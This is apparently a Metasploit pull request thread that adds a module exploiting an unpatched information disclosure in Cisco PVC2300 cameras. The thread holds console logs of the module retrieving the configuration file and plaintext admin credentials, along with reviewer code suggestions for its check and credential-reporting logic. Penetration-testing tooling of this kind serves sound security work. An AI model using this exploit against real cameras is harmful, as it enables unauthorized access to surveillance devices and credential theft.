Add auxiliary gather module for Cisco PVC2300 camera information disclosure
rapid7/metasploit-framework pull request #16857
Opened 2022-08-03 13:49 UTC by ErikWynter

# About
This change adds a new `auxiliary/gather` module for an information disclosure bug in Cisco PVC2300 cameras that was disclosed at blackhat all the way back in 2013 and has never been fixed. The vulnerability allows unauthenticated users to download the configuration file that contains the plaintext admin credentials to the web interface.

# Vulnerable systems
No known solution was made available for this vulnerability and no CVE has been published. It is therefore likely that most (if not all) Cisco PVC2300 cameras are affected.

# Notes
- I probably will not have access to a target after tomorrow, so I will send spool files with `HTTPTRACE` output from the module to `msfdev@metasploit.com`. The exploit is really very simple so I think this should suffice.
- The original blackhat presentation is available [here](https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf) (pdf, starts at page 36)
- I will add docs later. I just want to push this out now

# Scenario
```
[*] Spooling to file msf_cisco_pvc_2300_info_disclosure_spool.txt...
msf6 auxiliary(gather/cisco_pvc_2300_info_disclosure) > options 

Module options (auxiliary/gather/cisco_pvc_2300_info_disclosure):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.31.31.233    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

msf6 auxiliary(gather/cisco_pvc_2300_info_disclosure) > run
[*] Running module against 172.31.31.233

[*] The target may be vulnerable. Obtained sessionID 1122062985
[+] Successfully downloaded the configuration file
[*] Saving the full configuration file to /root/.msf4/loot/20220803124629_default_172.31.31.233_ciscopvc.config_489884.txt
[*] Obtained device name PVC2300 POE Video Camera
[+] Obtained the following admin credentials for the web interface from the configuration file:
[*] admin username: admin
[*] admin password: [obfuscated]
[*] Auxiliary module execution completed
```

2022-08-03 14:41 UTC, jmartin-r7 reviewed
Might be nice to have target validation treated as a `check` method.

2022-08-03 14:41 UTC, jmartin-r7 commented on modules/auxiliary/gather/cisco_pvc2300_download_config.rb
> +    vprint_status('Target seems to be a Cisco camera')
This seems appropriate as a `check` method although small amount or failure reason detail would occur:
```suggestion
def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path))

    unless res
      CheckCode::Unknown('Target is unreachable.')
    end

    # string together a few checks to make it more likely we're dealing with a Cisco camera
    unless res.code == 401 && res.headers.include?('WWW-Authenticate') && res.headers['WWW-Authenticate'] == 'Basic realm="IP Camera"'
      CheckCode::Safe('Target is not a Cisco PVC2300 POE Video Camera')
    end
    vprint_status('Target seems to be a Cisco camera')
    CheckCode::Appears
end

def run
  fail_with(Failure::NoTarget, 'Target is not a Cisco PVC2300 POE Video Camera') unless check
```

The call to fail_with in `run` could also deferred by using the AutoCheck mixin.

2022-08-03 14:58 UTC, ErikWynter commented on modules/auxiliary/gather/cisco_pvc2300_download_config.rb
> +    vprint_status('Target seems to be a Cisco camera')
@jmartin-r7 great idea, I have pushed this now and included `AutoCheck` so the fail_with call is not necessary

2022-08-03 15:19 UTC, smcintyre-r7 requested changes

2022-08-03 15:19 UTC, smcintyre-r7 commented on modules/auxiliary/gather/cisco_pvc2300_download_config.rb
> +    report_creds(admin_name, admin_password)
Only makes sense to report these if they're found.


```suggestion
```suggestion
    else
      print_good('Obtained the following admin credentials for the web interface from the configuration file:')
      print_status("admin username: #{admin_name}")
      print_status("admin password: #{admin_password}")
      # save the creds to the db
      report_creds(admin_name, admin_password)
    end
```

2022-08-03 16:11 UTC, ErikWynter commented on modules/auxiliary/gather/cisco_pvc2300_download_config.rb
> +    report_creds(admin_name, admin_password)
nice catch! fixed this now

2022-08-04 13:59 UTC, ErikWynter commented
I have added the docs now

2022-08-04 14:05 UTC, bwatters-r7 commented on modules/auxiliary/gather/cisco_pvc2300_download_config.rb
> +    vprint_status('Attempting to obain a session ID')
```suggestion
    vprint_status('Attempting to obtain a session ID')
```

2022-08-04 14:09 UTC, bwatters-r7 commented on modules/auxiliary/gather/cisco_pvc2300_download_config.rb
> +    unless res.code == 401 && res.headers.include?('WWW-Authenticate') && res.headers['WWW-Authenticate'] == 'Basic realm="IP Camera"'
There's nothing more unique in the res?

2022-08-04 14:28 UTC, ErikWynter commented on modules/auxiliary/gather/cisco_pvc2300_download_config.rb
> +    unless res.code == 401 && res.headers.include?('WWW-Authenticate') && res.headers['WWW-Authenticate'] == 'Basic realm="IP Camera"'
@bwatters-r7 yup. but I figured it makes sense to add an extra check for  `/oamp/System.xml` since that endpoint should be present. This works fine, I shared the HTTPTRACE with @zeroSteiner on slack

2022-08-04 14:29 UTC, ErikWynter commented on modules/auxiliary/gather/cisco_pvc2300_download_config.rb
> +    vprint_status('Attempting to obain a session ID')
fixed

2022-08-04 15:45 UTC, smcintyre-r7 approved these changes
Changes look good, I just noticed that the `#check` method was missing the `return` keyword for the check codes which was causing false-positives.

I'll commit that as I land it.

```
msf6 auxiliary(gather/cisco_pvc2300_download_config) > show options 

Module options (auxiliary/gather/cisco_pvc2300_download_config):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.159.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    8080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

msf6 auxiliary(gather/cisco_pvc2300_download_config) > check
[*] 192.168.159.128:8080 - The target appears to be vulnerable.
msf6 auxiliary(gather/cisco_pvc2300_download_config) > run
[*] Running module against 192.168.159.128

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] The target may be vulnerable. Obtained sessionID SESSSION
[+] Successfully downloaded the configuration file
[*] Saving the full configuration file to /home/smcintyre/.msf4/loot/20220804114423_default_192.168.159.128_ciscopvc.config_538157.txt
[*] Obtained device name PVC2300 POE Video Camera
[+] Obtained the following admin credentials for the web interface from the configuration file:
[*] admin username: admin
[*] admin password: M$fR0x!
[*] Auxiliary module execution completed
msf6 auxiliary(gather/cisco_pvc2300_download_config) >
```

2022-08-04 15:46 UTC, merged

2022-08-04 18:36 UTC, smcintyre-r7 commented
# Release Notes
This adds a module targeting Cisco PVC2300 IP Cameras that will download the configuration file using hard-coded credentials.